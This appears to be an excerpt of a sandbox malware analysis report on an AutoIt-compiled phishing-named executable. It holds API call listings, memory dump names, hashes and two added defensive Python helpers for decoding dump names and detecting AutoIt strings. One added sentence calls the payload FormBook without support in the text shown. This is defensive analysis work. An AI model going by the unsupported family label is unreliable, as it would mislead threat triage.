86436->86440 86437->86439 86438->86373 86439->86373 86440->86439 86552 475077 86441->86552 86443 4755c0 86443->86373 86445 46e7a2 86444->86445 86446 4115d7 52 API calls 
86445->86446 86449 46e802 86445->86449 86447 46e7ad 86446->86447 86448 46e7b9 86447->86448 86492 40da60 53 API calls 86447->86492 86493 4533eb 86448->86493 86450 46e7e5 86449->86450 86457 46e82f 86449->86457 86452 408f40 VariantClear 86450->86452 86454 46e7ea 86452->86454 86454->86386 86456 46e8b5 86485 4680ed 86456->86485 86457->86456 86460 46e845 86457->86460 86463 4533eb 85 API calls 86460->86463 86462 46e8bb 86489 443fbe 86462->86489 86472 46e84b 86463->86472 86464 46e7db 86464->86450 86509 44ae3e 86464->86509 86465 46e87a 86512 4689f4 59 API calls 86465->86512 86469 46e883 86471 4013c0 52 API calls 86469->86471 86473 46e88f 86471->86473 86472->86465 86472->86469 86475 40e0a0 52 API calls 86473->86475 86474 408f40 VariantClear 86483 46e881 86474->86483 86476 46e899 86475->86476 86513 40d200 52 API calls 2 library calls 86476->86513 86478 46e911 86478->86386 86479 46e8a5 86514 4689f4 59 API calls 86479->86514 86482 46e903 86484 44ae3e CloseHandle 86482->86484 86483->86478 86515 40da20 86483->86515 86484->86478 86486 468100 86485->86486 86487 4680fa 86485->86487 86486->86462 86519 467ac4 55 API calls 2 library calls 86487->86519 86520 443e36 86489->86520 86491 443fd3 86491->86474 86491->86483 86492->86448 86494 453404 86493->86494 86495 4533f8 86493->86495 86497 40de40 86494->86497 86495->86494 86527 4531b1 85 API calls 5 library calls 86495->86527 86498 40da20 CloseHandle 86497->86498 86499 40de4e 86498->86499 86528 40f110 86499->86528 86502 4264fa 86504 40de84 86537 40e080 SetFilePointerEx SetFilePointerEx 86504->86537 86506 40de8b 86538 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86506->86538 86508 40de90 86508->86457 86508->86464 86510 44ae4b moneypunct 86509->86510 86540 443fdf 86509->86540 86510->86450 86512->86483 86513->86479 86514->86483 86516 40da37 86515->86516 86517 40da29 86515->86517 86516->86517 86518 40da3c CloseHandle 86516->86518 86517->86482 86518->86482 86519->86486 86523 443e19 86520->86523 86524 443e26 86523->86524 86525 443e32 
                                                        Control-flow graph (tail of the interactive node/edge listing for this function; the rendered graph is not reproduced here). API calls visible on the listed edges: WriteFile, SetFilePointerEx, CreateFileW, CloseHandle, VariantClear, GetVersionExW, GetCurrentProcess, LoadLibraryA, GetProcAddress, GetSystemInfo, GetNativeSystemInfo, FreeLibrary, GetPEB, Sleep, GetStdHandle, CreateThread, RegOpenKeyExW, RegQueryValueExW, RegCloseKey. CRT helpers on the same edges: _wcslen, _memmove, _malloc, _strcat, _wcscpy, __wcsicoll, __itow_s, __cinit, moneypunct.
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004096C1
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _memmove.LIBCMT ref: 0040970C
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                        • _memmove.LIBCMT ref: 00409D96
                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                        • _memmove.LIBCMT ref: 004297E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                        • String ID:
                                                        • API String ID: 2383988440-0
                                                        • Opcode ID: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                        • Opcode Fuzzy Hash: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
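The "Memory Dump Source" entries above name the process memory regions the disassembly was taken from. The following is an added example (not Joe Sandbox code, and not part of this report) that decodes those file names so that the executable region can be picked out of the list. The field layout is an assumption inferred from matching the values against this sample's PE layout: the fourth field is read as the region base, the fifth as a PAGE_* protection constant and the seventh as a MEM_* region type; the remaining fields are carried through uninterpreted.

```python
"""
Decode Joe Sandbox memory-dump file names of the form listed under
"Memory Dump Source", e.g.
  00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp

ASSUMED layout (inferred from this sample's PE layout, not documented here):
  f1.f2.f3.<base>.<protect>.f6.<type>.f8.sdmp
<base>    region base address (hex)
<protect> PAGE_* protection constant (hex)
<type>    MEM_* region type (hex)
f1, f2, f3, f6, f8 are kept as raw strings.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Documented Windows constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\."
    r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int
    extra: Tuple[str, ...]  # f1, f2, f3, f6, f8, uninterpreted

    @property
    def protect_name(self) -> str:
        # Low byte holds the access constant; higher bits are modifiers
        # such as PAGE_GUARD, which we ignore for naming.
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* constants live in the 0x10..0x80 nibble.
        return bool(self.protect & 0xF0)


def parse_dump_name(name: str) -> DumpRegion:
    m = _NAME_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    f1, f2, f3, base, protect, f6, mem_type, f8 = m.groups()
    return DumpRegion(name=name, base=int(base, 16), protect=int(protect, 16),
                      mem_type=int(mem_type, 16), extra=(f1, f2, f3, f6, f8))


def summarize(names: List[str]) -> List[Tuple[int, str, str]]:
    """(base, protection, type) for each dump, ordered by base address."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    return [(r.base, r.protect_name, r.type_name) for r in regions]


def executable_regions(names: List[str]) -> List[int]:
    """Base addresses of the dumps whose protection allows execution."""
    return sorted(r.base for r in map(parse_dump_name, names) if r.executable)


# The eight dump names listed for this sample, copied from the report.
REPORT_DUMPS = [
    "00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for base, prot, typ in summarize(REPORT_DUMPS):
        print(f"{base:#010x}  {prot:<24} {typ}")
    print("executable:", [hex(b) for b in executable_regions(REPORT_DUMPS)])
```

Under the assumed layout the only executable dump is the one at 0x401000 (PAGE_EXECUTE_READ, MEM_IMAGE), which is the .text section the disassembly above is taken from; the 0x491000 region decodes as PAGE_WRITECOPY, i.e. image data not yet written to at dump time.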


                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?), ref: 00401F4C
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                        • String ID: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                        • API String ID: 2495805114-2974685841
                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                        Control-flow graph for the function at 0040E500 (the interactive graph, with its Executed / Not Executed block colouring, is not reproduced here). Blocks on the graph call 0040BC70, GetVersionExW, 00402160, 0040E660, 0040E680, 0040EF60, GetCurrentProcess, 0040EF20, 0040EFD0, 0040EF90, GetNativeSystemInfo, GetSystemInfo (two call sites) and FreeLibrary (two call sites).
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                        • String ID: 0SH
                                                        • API String ID: 3363477735-851180471
                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsThemeActive$uxtheme.dll
                                                        • API String ID: 2574300362-3542929980
                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                        • API String ID: 1762048999-758534266
                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A


                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?), ref: 00401F4C
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104), ref: 00428B5B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe$CMDLINE$CMDLINERAW
                                                        • API String ID: 3948761352-2687969043
                                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
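The strings surfaced in the listings above (the "This is a compiled AutoIt script" MessageBoxA banner, the "AutoIt v3" window class, the /AutoIt3ExecuteScript, /AutoIt3ExecuteLine, /AutoIt3OutputDebug and /ErrorStdOut command-line switches and the @GUI_* macros) are the stock AutoIt3 runtime, which means the FormBook payload is carried inside an AutoIt-compiled stub. The following is an added triage helper, not part of this report or of Joe Sandbox, that searches a byte blob for exactly those indicators, in both ASCII and UTF-16LE, since the runtime passes most of them to wide-character APIs while the banner goes to MessageBoxA as a narrow string. The sample blob and the two-indicator threshold are constructed for the example.

```python
"""
Static triage for AutoIt-compiled wrappers: find the AutoIt3 runtime strings
listed in this report inside a byte blob (a PE read from disk or a memory
dump), in both ASCII and UTF-16LE encodings.
"""
import re
from typing import Dict, Iterator, List, Tuple

# Indicators copied from the API/String listings of this report.
AUTOIT_INDICATORS: Dict[str, str] = {
    "av_banner": ("This is a compiled AutoIt script. AV researchers please "
                  "email avsupport@autoitscript.com for support."),
    "window_class": "AutoIt v3",
    "switch_execute_script": "/AutoIt3ExecuteScript",
    "switch_execute_line": "/AutoIt3ExecuteLine",
    "switch_output_debug": "/AutoIt3OutputDebug",
    "switch_error_stdout": "/ErrorStdOut",
    "macro_gui_ctrlhandle": "@GUI_CTRLHANDLE",
}


def _needles(text: str) -> Iterator[Tuple[str, bytes]]:
    """Both encodings a Windows binary is likely to carry the string in."""
    yield "ascii", text.encode("ascii")
    yield "utf16le", text.encode("utf-16-le")


def find_autoit_indicators(blob: bytes) -> List[dict]:
    """Every occurrence of every indicator, ordered by file offset."""
    hits = []
    for name, text in AUTOIT_INDICATORS.items():
        for enc, needle in _needles(text):
            for m in re.finditer(re.escape(needle), blob):
                hits.append({"name": name, "encoding": enc, "offset": m.start()})
    return sorted(hits, key=lambda h: h["offset"])


def is_probably_autoit(blob: bytes, min_distinct: int = 2) -> bool:
    """Require at least two distinct indicators (assumed threshold) so that a
    single stray string, e.g. the banner quoted in a document, does not fire."""
    return len({h["name"] for h in find_autoit_indicators(blob)}) >= min_distinct


# Constructed stand-in for a binary: a PE-like prefix, filler, then three of
# the indicators in the encodings a real AutoIt3 stub would carry.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100          # offsets 0..167
    + "AutoIt v3".encode("utf-16-le") + b"\x00" * 20               # wide, at 168
    + AUTOIT_INDICATORS["av_banner"].encode("ascii")               # narrow, at 206
    + b"\x00" * 8 + "/AutoIt3ExecuteScript".encode("utf-16-le")    # wide
)

if __name__ == "__main__":
    for hit in find_autoit_indicators(SAMPLE_BLOB):
        print(f"{hit['offset']:#08x} {hit['encoding']:<8} {hit['name']}")
    print("AutoIt-compiled:", is_probably_autoit(SAMPLE_BLOB))
```

Run over a real file with `find_autoit_indicators(open(path, "rb").read())`; hits for the banner plus any of the switches at non-overlapping offsets are a strong sign that the sample is an AutoIt3 stub and that the interesting payload is the embedded script or resource, not the runtime code these listings disassemble.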


                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                        • String ID: D)E$D)E$FILE
                                                        • API String ID: 3888824918-361185794
                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                        • _wcscat.LIBCMT ref: 00427541
                                                        • _wcslen.LIBCMT ref: 00427551
                                                        • _wcslen.LIBCMT ref: 00427562
                                                        • _wcscat.LIBCMT ref: 0042757C
                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                        Similarity
                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                        • String ID: Include$\
                                                        • API String ID: 3173733714-3429789819
                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

